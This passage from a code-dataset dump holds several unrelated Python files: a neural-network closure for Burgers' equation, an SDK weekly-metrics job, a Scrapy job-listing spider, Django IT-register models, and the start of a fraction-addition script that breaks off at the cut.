np.zeros((7,ns+1,nx+1))\n\nfor kk in range(7):\n nxb= int((kk+1)*nx/8)\n \n xTest = xi[kk,:,:]\n yTest = yi[kk,:,:]\n xtest = np.zeros((1,lookback,2*npt+1)) \n \n # Initializing\n uu = np.zeros(nx-nxb+1)\n uu[0] = 1.0\n u1 = np.zeros(nx-nxb+1)\n u1[0] = 1.0\n uLSTM[kk,0,nxb:] = uu\n for i in range(lookback):\n temp = xTest[i,:]\n temp = temp.reshape(1,-1)\n xtest[0,i,:] = scalerIn.transform(temp) \n \n # Prediction\n for i in range(lookback,ns+1):\n ytest = model.predict(xtest)\n ytest = scalerOut.inverse_transform(ytest) # rescale \n \n # integrate one time step || RK3 scheme\n # first step \n rr = rhsR(nx,dx,nu1,nu2,g1,g2,nxb,uu)\n u1[1:nx] = uu[1:nx] + dt*rr[1:nx]\n \n # second step\n rr = rhsR(nx,dx,nu1,nu2,g1,g2,nxb,u1)\n u1[1:nx] = 0.75*uu[1:nx] + 0.25*u1[1:nx] + 0.25*dt*rr[1:nx]\n \t\n # third step\n rr = rhsR(nx,dx,nu1,nu2,g1,g2,nxb,u1)\n uu[1:nx] = 1.0/3.0*uu[1:nx] + 2.0/3.0*u1[1:nx] + 2.0/3.0*dt*rr[1:nx]\n uu[0] = ytest\n u1[0] = ytest\n \n uLSTM[kk,i,nxb:] = uu\n print([kk,i])\n \n # Update xtest\n for k in range(lookback-1):\n xtest[0,k,:] = xtest[0,k+1,:]\n tmp = np.copy(xTest[i,:])\n tmp[0:npt] = uu[0:npt] \n tmp = tmp.reshape(1,-1)\n xtest[0,lookback-1,:] = scalerIn.transform(tmp) \n\nnp.save('./Data/uFOM.npy',uFOM)\nnp.save('./Data/uLP_'+str(npt)+'.npy',uLSTM)\n\n\n","sub_path":"1_1D Burgers [Ex1 and Ex2]/1_Right travelling wave [Ex1]/2_Burgers_Square_LP_closure.py","file_name":"2_Burgers_Square_LP_closure.py","file_ext":"py","file_size_in_byte":8263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"483545748","text":"# coding=utf-8\n\n# 周累计用户、付费信息统计\n# Author:liqianxi\n# Date:2015/03/10\n\nimport os\nimport logging\nimport datetime\n\nfrom pygodzilla.stream_handler import metrics\nfrom pygodzilla.context import Context\n\nfrom pipelines import *\n\n\nlogging.basicConfig(format='%(levelname)s %(asctime)-15s '\n '%(filename)s@%(funcName)s:%(message)s',\n level=logging.INFO)\n\nos.environ['HADOOP_USER_NAME'] = 'godzilla'\n\n\ndef week_days():\n return lambda x: (x,\n x + datetime.timedelta(days=1), x + datetime.timedelta(days=2), x + datetime.timedelta(days=3),\n x + datetime.timedelta(days=4), x + datetime.timedelta(days=5), x + datetime.timedelta(days=6))\n\n\nctx = Context(\"sdk\", {\n \"mongo_host\": \"10.0.0.57\",\n \"mongo_database\": \"godzilla\"\n})\n\n# 用户、设备(分应用)\nweekly_users_by_app_id = metrics('sdk', reg_or_login_events.with_date(week_days()),\n group_by='appId',\n rules=[\n ('__weekly_users_by_app_id', 'countDistinct(userId)'),\n ('__weekly_devices_by_app_id', 'countDistinct(deviceId)')\n ])\n\n# 活跃用户、活跃设备(分应用)\nweekly_active_users_by_app_id = metrics('sdk', login_events.with_date(week_days()),\n group_by=\"appId\",\n rules=[\n ('__weekly_active_users_by_app_id', 'countDistinct(userId)'),\n ('__weekly_active_devices_by_app_id', 'countDistinct(deviceId)')\n ])\n\n# 付费用户(分应用)\nweekly_pay_users_by_app_id = metrics('sdk', weekly_pay_users_amounts,\n group_by=\"appId\",\n rules=[\n ('__weekly_pay_users_by_app_id', 'countDistinct(userId)'),\n ('__weekly_pay_real_amount_by_app_id', 'sum(realAmount)')\n ])\n\n# 用户、设备\nweekly_users = metrics('sdk', reg_or_login_events.with_date(week_days()),\n rules=[\n ('__weekly_users', 'countDistinct(userId)'),\n ('__weekly_devices', 'countDistinct(deviceId)')\n ])\n\n# 活跃用户、活跃设备\nweekly_active_users = metrics('sdk', login_events.with_date(week_days()),\n rules=[\n ('__weekly_active_users', 'countDistinct(userId)'),\n ('__weekly_active_devices', 'countDistinct(deviceId)')\n ])\n\n# 付费用户\nweekly_pay_users = metrics('sdk', weekly_pay_users_amounts,\n rules=[\n ('__weekly_pay_users', 'countDistinct(userId)'),\n ('__weekly_pay_real_amount', 'sum(realAmount)')\n ])\n\nall_metrics = [\n weekly_users_by_app_id,\n weekly_active_users_by_app_id,\n weekly_pay_users_by_app_id,\n weekly_users,\n weekly_active_users,\n weekly_pay_users\n]\n\nctx.add_tasks(all_metrics)\n\nif __name__ == '__main__':\n ctx.run('weekly')\n","sub_path":"sdk/weekly.py","file_name":"weekly.py","file_ext":"py","file_size_in_byte":3389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"359112179","text":"\"\"\"\nCatenon spider created on the top of ATSSpider\n\nscrapy crawl catenon -a mining_job_id=9999 -a iteration=1 -a extract=1 -a url=\"http://catenon.com/jobs\"\n\nSample URL:\n http://catenon.com/jobs\n\"\"\"\n\nfrom re import compile\nfrom scrapy.http import Request\nfrom scrapy.selector import Selector\nfrom urlparse import urljoin\nfrom urllib import urlencode\n\nfrom brightcorp.base.atsspiders import ATSSpider\nfrom brightcorp.items import BrightcorpItemLoader\nfrom brightcorp.processors import Prefix, Replace\n\npattern = {\n 'open_parenthesis': compile(r'([(])'),\n 'close_parenthesis': compile(r'([)])'),\n}\n\n\nclass Catenon(ATSSpider):\n\n name = 'catenon'\n # Taking table header and map to english headers\n mapping_table_headers = {\n 'Position': 'title',\n 'Location': 'location',\n 'Reference': 'ref_id',\n 'Sector': 'jobcategory',\n }\n logo_url = ''\n\n def parse(self, response):\n sel = Selector(response)\n logo_url = sel.xpath(\n '//div[contains(@class, \"logo\")]/a/img/@src'\n ).extract()\n if logo_url:\n self.logo_url = urljoin(\n response.url, logo_url[0].replace('..', '')\n )\n categories = sel.xpath(\n '//div/select[@id=\"areaSearchSelect\"]/option[not(position()=1)]/@value'\n ).extract()\n params = {\n 'idpais': '-1',\n 'idareaCrm': '-1',\n 'idpuestoCrm': '-1',\n 'keywords': '',\n }\n for cat_value in categories:\n params.update({'idareaCrm': str(cat_value)})\n yield Request(\n callback=self.parse_jobs_list,\n url=urljoin(\n response.url,\n '/jobs/search.action?%s' % urlencode(params)\n )\n )\n\n def parse_jobs_list(self, response):\n sel = Selector(response)\n\n table_header = sel.xpath(\n '//table[@id=\"jobs\"]/thead/tr/td/strong/text()'\n ).extract()\n meta_xpaths = {}\n for th in table_header:\n if th in self.mapping_table_headers:\n meta_xpaths[\n self.mapping_table_headers[th]\n ] = './td[%s]//text()' % str(table_header.index(th) + 1)\n for tr in sel.xpath(\n '//table[@id=\"jobs\"]/tbody/tr'\n ):\n job_url = tr.xpath('./td/a/@href').extract()\n if job_url:\n meta_data = {}\n for key, value in meta_xpaths.iteritems():\n meta_data[key] = tr.xpath(value).extract()\n yield Request(\n callback=self.parse_job_callback(),\n meta=meta_data,\n url=urljoin(response.url, job_url[0])\n )\n\n def parse_job(self, response):\n \"\"\"\n Extract all required information.\n \"\"\"\n sel = Selector(response)\n\n loader = BrightcorpItemLoader(selector=sel)\n\n loader.add_xpath(\n 'title',\n '//div[@id=\"detalle_oferta\"]/div/h3/text()'\n )\n if not loader.get_output_value('title'):\n loader.add_value(\n 'title', response.meta.get('title')\n )\n loader.add_value(\n 'location',\n response.meta.get('location'),\n Replace(pattern['open_parenthesis'], ', '),\n Replace(pattern['close_parenthesis'])\n )\n loader.add_value(\n 'referencenumber',\n response.meta.get('ref_id'),\n Prefix('%s-' % self.name)\n )\n loader.add_value('url', response.url)\n loader.add_xpath(\n 'description',\n [\n '//div/h3[contains(text(), \"Functions\")]',\n '//div/h3[contains(text(), \"Functions\")]/../following-sibling::ul[1]'\n ]\n )\n loader.add_xpath(\n 'requirements',\n [\n '//div/h3[contains(text(), \"Requirements\")]',\n '//div/h3[contains(text(), \"Requirements\")]/../following-sibling::ul[1]'\n ]\n )\n loader.add_value(\n 'jobcategory', response.meta.get('jobcategory')\n )\n loader.add_value(\n 'logo_url', self.logo_url\n )\n loader.add_value('apply_url', response.url)\n\n yield loader.load_item()\n","sub_path":"brightcorp/brightcorp/spiders/catenon.py","file_name":"catenon.py","file_ext":"py","file_size_in_byte":4351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"226769007","text":"from __future__ import unicode_literals, absolute_import\nfrom django.utils import timezone\nfrom django.utils.safestring import mark_safe\nfrom django.contrib.postgres.fields import JSONField\nfrom django.contrib.gis.db import models\n\nfrom mptt.models import MPTTModel, TreeForeignKey\nfrom dateutil.relativedelta import relativedelta\nfrom datetime import timedelta, datetime\n\nfrom tracking import models as tracking\n\n\nCRITICALITY_CHOICES = (\n (1, 'Critical'),\n (2, 'Moderate'),\n (3, 'Low'),\n)\nIMPORTANCE_CHOICES = (\n (1, 'High'),\n (2, 'Medium'),\n (3, 'Low'),\n)\nDOC_STATUS_CHOICES = (\n (1, 'Draft'),\n (2, 'Released'),\n (3, 'Superseded'),\n)\n\n\nclass DocumentApproval(models.Model):\n \"\"\"A model to represent an approval/endorsement by a DepartmentUser for an\n uploaded file.\n \"\"\"\n department_user = models.ForeignKey(tracking.DepartmentUser, on_delete=models.PROTECT)\n approval_role = models.CharField(\n max_length=256, blank=True, null=True,\n help_text='The role in which the user is approving the document.')\n evidence = models.FileField(\n blank=True, null=True, max_length=255, upload_to='uploads/%Y/%m/%d',\n help_text='Optional evidence to support the document approval (email, etc.)')\n date_created = models.DateTimeField(auto_now_add=True, editable=False)\n\n def __str__(self):\n if self.approval_role:\n return \"{}, {} ({})\".format(\n self.department_user, self.approval_role,\n datetime.strftime(self.date_created, '%d-%b-%Y'))\n else:\n return \"{} ({})\".format(\n self.department_user, datetime.strftime(self.date_created, '%d-%b-%Y'))\n\n\nclass Location(models.Model):\n name = models.CharField(max_length=256, unique=True)\n manager = models.ForeignKey(tracking.DepartmentUser, on_delete=models.PROTECT, null=True, blank=True)\n address = models.TextField(unique=True, blank=True)\n pobox = models.TextField(blank=True, verbose_name='PO Box')\n phone = models.CharField(max_length=128, null=True, blank=True)\n fax = models.CharField(max_length=128, null=True, blank=True)\n email = models.CharField(max_length=128, null=True, blank=True)\n point = models.PointField(null=True, blank=True)\n url = models.CharField(max_length=2000, help_text=\"URL to webpage with more information\", null=True, blank=True)\n bandwidth_url = models.CharField(max_length=2000, help_text=\"URL to prtg graph of bw utilisation\", null=True, blank=True)\n\n def __str__(self):\n return \"{} ({})\".format(self.name, self.address)\n\n def as_dict(self):\n return {k: getattr(self, k) for k in (\"name\", \"address\", \"pobox\", \"phone\", \"fax\", \"email\") if getattr(self, k)}\n\n def save(self, *args, **kwargs):\n for orgunit in self.orgunit_set.all():\n orgunit.save()\n super(Location, self).save(*args, **kwargs)\n\n class Meta:\n ordering = ('name',)\n\n\nclass SecondaryLocation(models.Model):\n location = models.ForeignKey(Location)\n name = models.CharField(max_length=256, unique=True)\n manager = models.ForeignKey(tracking.DepartmentUser, on_delete=models.PROTECT, null=True, blank=True)\n phone = models.CharField(max_length=128, null=True, blank=True)\n fax = models.CharField(max_length=128, null=True, blank=True)\n email = models.CharField(max_length=128, null=True, blank=True)\n\n def __str__(self):\n return self.name\n\n def save(self, *args, **kwargs):\n for orgunit in self.orgunit_set.all():\n orgunit.save()\n super(SecondaryLocation, self).save(*args, **kwargs)\n\n def as_dict(self):\n return {k: getattr(self, k) for k in (\"name\", \"phone\", \"fax\", \"email\") if getattr(self, k)}\n\n\nclass OrgUnit(MPTTModel):\n TYPE_CHOICES = (\n (0, \"Department\"),\n (1, \"Division\"),\n (2, \"Branch\"),\n (3, \"Region\"),\n (4, \"Cost Centre\"),\n (5, \"Office\"),\n (6, \"District\"),\n (7, \"Section\"),\n )\n TYPE_CHOICES_DICT = dict(TYPE_CHOICES)\n unit_type = models.PositiveSmallIntegerField(choices=TYPE_CHOICES, default=4)\n ad_guid = models.CharField(max_length=48, unique=True, null=True, editable=False)\n ad_dn = models.CharField(max_length=512, unique=True, null=True, editable=False)\n name = models.CharField(max_length=256, unique=True)\n acronym = models.CharField(max_length=16, null=True, blank=True)\n manager = models.ForeignKey(tracking.DepartmentUser, on_delete=models.PROTECT, null=True, blank=True)\n parent = TreeForeignKey('self', on_delete=models.PROTECT, null=True, blank=True, related_name='children', db_index=True)\n details = JSONField(null=True, blank=True)\n location = models.ForeignKey(Location, on_delete=models.PROTECT, null=True, blank=True)\n secondary_location = models.ForeignKey(SecondaryLocation, on_delete=models.PROTECT, null=True, blank=True)\n\n def cc(self):\n try:\n return self.costcentre\n except:\n return None\n\n def __str__(self):\n name = self.name\n if self.acronym:\n name = \"{} - {}\".format(self.acronym, name)\n if self.cc():\n return \"{} - CC{}\".format(name, self.cc())\n return name\n\n def members(self):\n from tracking.models import DepartmentUser\n return DepartmentUser.objects.filter(org_unit__in=self.get_descendants(include_self=True), **DepartmentUser.ACTIVE_FILTER)\n\n def save(self, *args, **kwargs):\n self.details = self.details or {}\n self.details.update({\n \"type\": self.get_unit_type_display(),\n })\n if self.secondary_location:\n self.location = self.secondary_location.location\n if not getattr(self, \"cheap_save\", False):\n for user in self.departmentuser_set.all():\n user.save()\n super(OrgUnit, self).save(*args, **kwargs)\n\n class MPTTMeta:\n order_insertion_by = ['name']\n\n class Meta:\n ordering = ('name',)\n\n\nclass CostCentre(models.Model):\n name = models.CharField(max_length=25, unique=True, editable=False)\n code = models.CharField(max_length=5, unique=True)\n division = models.ForeignKey(OrgUnit, null=True, editable=False, related_name=\"costcentres_in_division\")\n org_position = models.OneToOneField(OrgUnit, unique=True)\n manager = models.ForeignKey(tracking.DepartmentUser, on_delete=models.PROTECT, related_name=\"manage_ccs\", null=True, blank=True)\n business_manager = models.ForeignKey(tracking.DepartmentUser, on_delete=models.PROTECT, related_name=\"bmanage_ccs\", help_text=\"Business Manager\", null=True, blank=True)\n admin = models.ForeignKey(tracking.DepartmentUser, on_delete=models.PROTECT, related_name=\"admin_ccs\", help_text=\"Admin\", null=True, blank=True)\n tech_contact = models.ForeignKey(tracking.DepartmentUser, on_delete=models.PROTECT, related_name=\"tech_ccs\", help_text=\"Technical Contact\", null=True, blank=True)\n\n def save(self, *args, **kwargs):\n self.name = str(self)\n division = self.org_position.get_ancestors(include_self=True).filter(unit_type=1)\n if division:\n self.division = division.first()\n for user in self.departmentuser_set.all():\n user.save()\n super(CostCentre, self).save(*args, **kwargs)\n\n def __str__(self):\n name = '{}'.format(self.code)\n dept = self.org_position.get_ancestors(include_self=True).filter(unit_type=0)\n if dept:\n name += \" ({})\".format(dept.first().acronym)\n return name\n\n class Meta:\n ordering = ('code',)\n\n\nclass Software(models.Model):\n \"\"\"A model to represent a discrete unit of software (OS, runtime, etc.)\n \"\"\"\n name = models.CharField(max_length=2048, unique=True)\n url = models.CharField(max_length=2000, null=True, blank=True)\n license = models.ForeignKey('registers.SoftwareLicense', on_delete=models.PROTECT, null=True)\n os = models.BooleanField(default=False, verbose_name='OS', help_text='Software is an operating system?')\n\n class Meta:\n verbose_name_plural = 'software'\n\n def __str__(self):\n return self.name\n\n\nclass Hardware(tracking.CommonFields):\n device_type = models.PositiveSmallIntegerField(choices=(\n (1, 'Network'), (2, 'Mobile'), (3, 'Domain PC'), (4, 'Hostname')))\n computer = models.OneToOneField(tracking.Computer, null=True, editable=False)\n mobile = models.OneToOneField(tracking.Mobile, null=True, editable=False)\n username = models.CharField(max_length=128, null=True, editable=False)\n email = models.CharField(max_length=512, null=True, editable=False)\n ipv4 = models.TextField(default='', editable=False)\n ports = models.TextField(default='', editable=False)\n name = models.CharField(max_length=2048, unique=True, editable=False)\n serials = models.TextField(null=True, editable=False)\n local_info = models.TextField(null=True, editable=False)\n local_current = models.BooleanField(default=True, help_text='Does local state match central state?')\n os = models.ForeignKey(\n Software, on_delete=models.PROTECT, null=True, blank=True, limit_choices_to={'os': True},\n verbose_name='operating system')\n location = models.ForeignKey(Location, on_delete=models.PROTECT, null=True, blank=True, help_text='Physical location')\n\n def __str__(self):\n return '{}:{} ({})'.format(self.get_device_type_display(), self.name, self.cost_centre)\n\n class Meta:\n unique_together = ('computer', 'mobile')\n ordering = ('name', '-device_type')\n verbose_name_plural = 'hardware'\n\n\nclass Device(tracking.CommonFields):\n TYPE_CHOICES = (\n (0, \"Computer\"),\n (1, \"Mobile\"),\n (2, \"PRTG\"),\n )\n name = models.CharField(max_length=2048, unique=True)\n owner = models.ForeignKey(tracking.DepartmentUser, on_delete=models.PROTECT, null=True, related_name=\"devices_owned\")\n guid = models.CharField(max_length=48, unique=True, help_text=\"AD GUID (ad:...) or PRTG object id (prtg:...)\")\n device_type = models.PositiveSmallIntegerField(choices=TYPE_CHOICES, default=0)\n\n def __str__(self):\n return self.name\n\n\nclass UserGroup(models.Model):\n \"\"\"A model to represent an arbitrary group of users for an IT System.\n E.g. 'All department staff', 'External govt agency staff', etc.\n \"\"\"\n name = models.CharField(max_length=2048, unique=True)\n user_count = models.PositiveIntegerField(blank=True, null=True)\n\n def __str__(self):\n return '{} ({})'.format(self.name, self.user_count)\n\n\nclass ITSystemHardware(models.Model):\n \"\"\"A model to represent the relationship between an IT System and a\n Hardware entity.\n \"\"\"\n ROLE_CHOICES = (\n (1, 'Application server'),\n (2, 'Database server'),\n (3, 'Network file storage'),\n (4, 'Reverse proxy'),\n )\n host = models.ForeignKey(Hardware, on_delete=models.PROTECT)\n role = models.PositiveSmallIntegerField(choices=ROLE_CHOICES)\n\n class Meta:\n verbose_name_plural = 'IT system hardware'\n unique_together = ('host', 'role')\n\n def __str__(self):\n return '{} ({})'.format(self.host.name, self.role)\n\n\nclass ITSystem(tracking.CommonFields):\n STATUS_CHOICES = (\n (0, \"Production\"),\n (1, \"Development\"),\n (2, \"Production (Legacy)\"),\n (3, \"Decommissioned\"),\n (4, \"Unknown\")\n )\n ACCESS_CHOICES = (\n (1, 'Public Internet'),\n (2, 'Authenticated Extranet'),\n (3, 'Corporate Network'),\n (4, 'Local System (Networked)'),\n (5, 'Local System (Standalone)')\n )\n AUTHENTICATION_CHOICES = (\n (1, 'Domain Credentials'),\n (2, 'Single Sign On'),\n (3, 'Externally Managed')\n )\n AVAILABILITY_CHOICES = (\n (1, '24 hours a day, 7 days a week, 365 days a year'),\n (2, 'Department core business hours'),\n )\n SYSTEM_TYPE_CHOICES = (\n (1, 'Web application'),\n (2, 'Client application'),\n (3, 'Mobile application'),\n (4, 'Service'),\n )\n name = models.CharField(max_length=128, unique=True)\n system_id = models.CharField(max_length=16, unique=True)\n acronym = models.CharField(max_length=16, null=True, blank=True)\n status = models.PositiveSmallIntegerField(choices=STATUS_CHOICES, default=4)\n status_display = models.CharField(max_length=128, null=True, editable=False)\n description = models.TextField(blank=True)\n devices = models.ManyToManyField(Device, blank=True)\n owner = models.ForeignKey(tracking.DepartmentUser, on_delete=models.PROTECT, null=True, related_name=\"systems_owned\", help_text=\"Application owner\")\n custodian = models.ForeignKey(tracking.DepartmentUser, on_delete=models.PROTECT, null=True, related_name=\"systems_custodianed\", help_text=\"Appication custodian\")\n data_custodian = models.ForeignKey(tracking.DepartmentUser, on_delete=models.PROTECT, related_name=\"systems_data_custodianed\", null=True, blank=True)\n preferred_contact = models.ForeignKey(tracking.DepartmentUser, on_delete=models.PROTECT, related_name=\"systems_preferred_contact\", null=True, blank=True)\n link = models.CharField(max_length=2048, null=True, blank=True, help_text=\"URL to web application\")\n documentation = models.URLField(max_length=2048, null=True, blank=True, help_text=\"URL to end-user documentation\")\n technical_documentation = models.URLField(max_length=2048, null=True, blank=True, help_text=\"URL to technical documentation\")\n status_html = models.URLField(max_length=2048, null=True, blank=True, help_text=\"URL to status/uptime info\")\n authentication = models.PositiveSmallIntegerField(choices=AUTHENTICATION_CHOICES, default=1)\n authentication_display = models.CharField(max_length=128, null=True, editable=False)\n access = models.PositiveSmallIntegerField(choices=ACCESS_CHOICES, default=3)\n access_display = models.CharField(max_length=128, null=True, editable=False)\n request_access = models.TextField(blank=True)\n criticality = models.PositiveIntegerField(choices=CRITICALITY_CHOICES, null=True, blank=True)\n availability = models.PositiveIntegerField(choices=AVAILABILITY_CHOICES, null=True, blank=True, help_text='Expected availability for this IT System')\n schema_url = models.URLField(max_length=2048, null=True, blank=True, help_text='URL to schema diagram')\n user_groups = models.ManyToManyField(UserGroup, blank=True, help_text='User group(s) that use this IT System')\n softwares = models.ManyToManyField(Software, blank=True, help_text='Software that is used to provide this IT System')\n hardwares = models.ManyToManyField(ITSystemHardware, blank=True, help_text='Hardware that is used to provide this IT System')\n bh_support = models.ForeignKey(\n tracking.DepartmentUser, on_delete=models.PROTECT, null=True, blank=True, related_name=\"bh_support\",\n verbose_name='business hours support', help_text='Business hours support contact')\n ah_support = models.ForeignKey(\n tracking.DepartmentUser, on_delete=models.PROTECT, null=True, blank=True, related_name=\"ah_support\",\n verbose_name='after hours support', help_text='After-hours support contact')\n system_reqs = models.TextField(blank=True, help_text='A written description of the requirements to use the system (e.g. web browser version)')\n system_type = models.PositiveSmallIntegerField(choices=SYSTEM_TYPE_CHOICES, null=True, blank=True)\n vulnerability_docs = models.URLField(max_length=2048, null=True, blank=True, help_text='URL to documentation related to known vulnerability reports')\n workaround = models.TextField(blank=True, help_text='Written procedure for users to work around an outage of this system')\n recovery_docs = models.URLField(max_length=2048, null=True, blank=True, help_text='URL to recovery procedure(s) in the event of system failure')\n mtd = models.DurationField(help_text=\"Maximum Tolerable Downtime (days hh:mm:ss)\", default=timedelta(days=14))\n rto = models.DurationField(help_text=\"Recovery Time Objective (days hh:mm:ss)\", default=timedelta(days=7))\n rpo = models.DurationField(help_text=\"Recovery Point Objective/Data Loss Interval (days hh:mm:ss)\", default=timedelta(hours=24))\n contingency_plan = models.FileField(\n blank=True, null=True, max_length=255, upload_to='uploads/%Y/%m/%d',\n help_text='NOTE: changes to this field will delete current contingency plan approvals.')\n contingency_plan_status = models.PositiveIntegerField(\n choices=DOC_STATUS_CHOICES, null=True, blank=True)\n contingency_plan_approvals = models.ManyToManyField(DocumentApproval, blank=True)\n contingency_plan_last_tested = models.DateField(\n null=True, blank=True, help_text='Date that the plan was last tested.')\n\n def __init__(self, *args, **kwargs):\n super(ITSystem, self).__init__(*args, **kwargs)\n # Store the pre-save values of some fields on object init.\n self.__original_contingency_plan = self.contingency_plan\n\n def __str__(self):\n return self.name\n\n class Meta:\n verbose_name = \"IT System\"\n ordering = ['name']\n\n def description_html(self):\n return mark_safe(self.description)\n\n def save(self, *args, **kwargs):\n if not self.system_id:\n self.system_id = \"S{0:03d}\".format(ITSystem.objects.order_by(\"-pk\").first().pk+1)\n self.status_display = self.get_status_display()\n self.authentication_display = self.get_authentication_display()\n if not self.link: # systems with no link default to device\n self.access = 4\n self.access_display = self.get_access_display()\n super(ITSystem, self).save(*args, **kwargs)\n\n\nclass Backup(tracking.CommonFields):\n ROLE_CHOICES = (\n (0, \"Generic Server\"),\n (1, \"Domain Controller\"),\n (2, \"Database Server\"),\n (3, \"Application Host\"),\n (4, \"Management Server\"),\n (5, \"Site Server\"),\n (6, \"File Server\"),\n (7, \"Print Server\"),\n (8, \"Block Storage Server\"),\n (9, \"Email Server\"),\n (10, \"Network Device\"))\n STATUS_CHOICES = (\n (0, \"Production\"),\n (1, \"Pre-Production\"),\n (2, \"Legacy\"),\n (3, \"Decommissioned\")\n )\n SCHEDULE_CHOICES = (\n (0, \"Manual\"),\n (1, \"Point in time, 7 day retention\"),\n (2, \"Daily, 7 day retention\"),\n (3, \"Daily, 30 day retention\"),\n (4, \"Weekly, 1 month retention\")\n )\n system = models.OneToOneField(Hardware)\n operating_system = models.CharField(max_length=120)\n parent_host = models.ForeignKey(Hardware, on_delete=models.PROTECT, null=True, blank=True, related_name=\"host\")\n role = models.PositiveSmallIntegerField(choices=ROLE_CHOICES, default=0)\n status = models.PositiveSmallIntegerField(choices=STATUS_CHOICES, default=0)\n database_backup = models.CharField(max_length=2048, null=True, blank=True, help_text=\"URL to Database backup/restore/logs info\")\n database_schedule = models.PositiveSmallIntegerField(choices=SCHEDULE_CHOICES, default=0)\n filesystem_backup = models.CharField(max_length=2048, null=True, blank=True, help_text=\"URL to Filesystem backup/restore/logs info\")\n filesystem_schedule = models.PositiveSmallIntegerField(choices=SCHEDULE_CHOICES, default=0)\n appdata_backup = models.CharField(max_length=2048, null=True, blank=True, help_text=\"URL to Application Data backup/restore/logs info\")\n appdata_schedule = models.PositiveSmallIntegerField(choices=SCHEDULE_CHOICES, default=0)\n appconfig_backup = models.CharField(max_length=2048, null=True, blank=True, help_text=\"URL to Config for App/Server\")\n appconfig_schedule = models.PositiveSmallIntegerField(choices=SCHEDULE_CHOICES, default=0)\n os_backup = models.CharField(max_length=2048, null=True, blank=True, help_text=\"URL to Build Documentation\")\n os_schedule = models.PositiveSmallIntegerField(choices=SCHEDULE_CHOICES, default=0)\n last_tested = models.DateField(null=True, blank=True, help_text=\"Last tested date\")\n test_schedule = models.PositiveSmallIntegerField(default=12, help_text=\"Test Schedule in Months, 0 for never\")\n comment = models.TextField(blank=True)\n\n def next_test_date(self):\n if self.test_schedule == 0:\n return \"Doesn't require testing\"\n if not self.last_tested:\n return \"NEVER TESTED\"\n else:\n return self.last_tested + relativedelta(months=self.test_schedule)\n\n def test_overdue(self):\n if self.test_schedule == 0:\n return False\n if not self.last_tested:\n return True\n return self.next_test_date() < timezone.now().date()\n\n def __str__(self):\n return \"{} ({})\".format(self.system.name.split(\".\")[0], self.get_status_display())\n\n class Meta:\n ordering = (\"system__name\",)\n\n\nclass Vendor(models.Model):\n name = models.CharField(max_length=256, unique=True)\n details = models.TextField(blank=True)\n extra_data = JSONField(default=dict(), null=True, blank=True)\n\n def __str__(self):\n return self.name\n\n\nclass SoftwareLicense(tracking.CommonFields):\n \"\"\"\n Represents a software licensing arrangement.\n \"\"\"\n name = models.CharField(max_length=256, unique=True)\n url = models.URLField(max_length=2000, null=True, blank=True)\n support = models.TextField(blank=True, help_text='Support timeframe or scope')\n support_url = models.URLField(max_length=2000, null=True, blank=True)\n oss = models.NullBooleanField(default=None, help_text='Open-source/free software license?')\n primary_user = models.ForeignKey(tracking.DepartmentUser, on_delete=models.PROTECT, null=True, blank=True)\n devices = models.ManyToManyField(Device, blank=True)\n vendor = models.ForeignKey(Vendor, on_delete=models.PROTECT, null=True, blank=True)\n used_licenses = models.PositiveSmallIntegerField(default=0, editable=False)\n available_licenses = models.PositiveSmallIntegerField(default=0, null=True, blank=True)\n license_details = models.TextField(blank=True, help_text=\"Direct license keys or details\")\n\n def __str__(self):\n return self.name\n\n\nclass BusinessService(models.Model):\n \"\"\"Represents the Department's core business services.\n \"\"\"\n number = models.PositiveIntegerField(unique=True, help_text='Service number')\n name = models.CharField(max_length=256, unique=True)\n description = models.TextField(null=True, blank=True)\n\n def __str__(self):\n return 'Service {}: {}'.format(self.number, self.name)\n\n\nclass BusinessFunction(models.Model):\n \"\"\"Represents a function of the Department, undertaken to meet the\n Department's core services. Each function must be linked to 1+\n BusinessService object.\n \"\"\"\n name = models.CharField(max_length=256, unique=True)\n description = models.TextField(null=True, blank=True)\n services = models.ManyToManyField(BusinessService)\n\n def __str__(self):\n return self.name\n\n\nclass BusinessProcess(models.Model):\n \"\"\"Represents a business process that the Department undertakes in order\n to fulfil one of the Department's functions.\n \"\"\"\n name = models.CharField(max_length=256, unique=True)\n description = models.TextField(null=True, blank=True)\n functions = models.ManyToManyField(BusinessFunction)\n criticality = models.PositiveIntegerField(\n choices=CRITICALITY_CHOICES, null=True, blank=True, help_text='How critical is the process?')\n\n class Meta:\n verbose_name_plural = 'business processes'\n\n def __str__(self):\n return self.name\n\n\nclass ProcessITSystemRelationship(models.Model):\n \"\"\"A model to represent the relationship between a BusinessProcess and an\n ITSystem object.\n \"\"\"\n process = models.ForeignKey(BusinessProcess, on_delete=models.PROTECT)\n itsystem = models.ForeignKey(ITSystem, on_delete=models.PROTECT)\n importance = models.PositiveIntegerField(\n choices=IMPORTANCE_CHOICES, help_text='How important is the IT System to undertaking this process?')\n\n class Meta:\n unique_together = ('process', 'itsystem')\n\n def __str__(self):\n return '{} - {} ({})'.format(self.itsystem.name, self.process.name, self.get_importance_display())\n\n\nclass ITSystemDependency(models.Model):\n \"\"\"A model to represent a dependency that an ITSystem has on another, plus\n the criticality of that dependency.\n \"\"\"\n itsystem = models.ForeignKey(\n ITSystem, on_delete=models.PROTECT, verbose_name='IT System', help_text='The IT System')\n dependency = models.ForeignKey(\n ITSystem, on_delete=models.PROTECT, related_name='dependency',\n help_text='The system which is depended upon by the IT System')\n criticality = models.PositiveIntegerField(\n choices=CRITICALITY_CHOICES, help_text='How critical is the dependency?')\n\n class Meta:\n verbose_name = 'IT System dependency'\n verbose_name_plural = 'IT System dependencies'\n unique_together = ('itsystem', 'dependency')\n\n def __str__(self):\n return '{} - {} ({})'.format(self.itsystem.name, self.dependency.name, self.get_criticality_display())\n","sub_path":"registers/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":25168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"129952559","text":"#vim: set ai tw=79 expandtab tabstop=4:\n\nimport sys\n\nnum1 = int(sys.argv[1]) \ndenom1 = int(sys.argv[2]) \nnum2 = int(sys.argv[3]) \ndenom2 = int(sys.argv[4]) \n\nif(denom1 != 0 and denom2 != 0):\n num_out = num1*denom2 + num2*denom1\n denom_out = denom1*denom2\n\n#### Extra Credit ####\n f = 1 # f = potential common factor\n while f <= abs(denom_out): # Why the `abs'?\n if 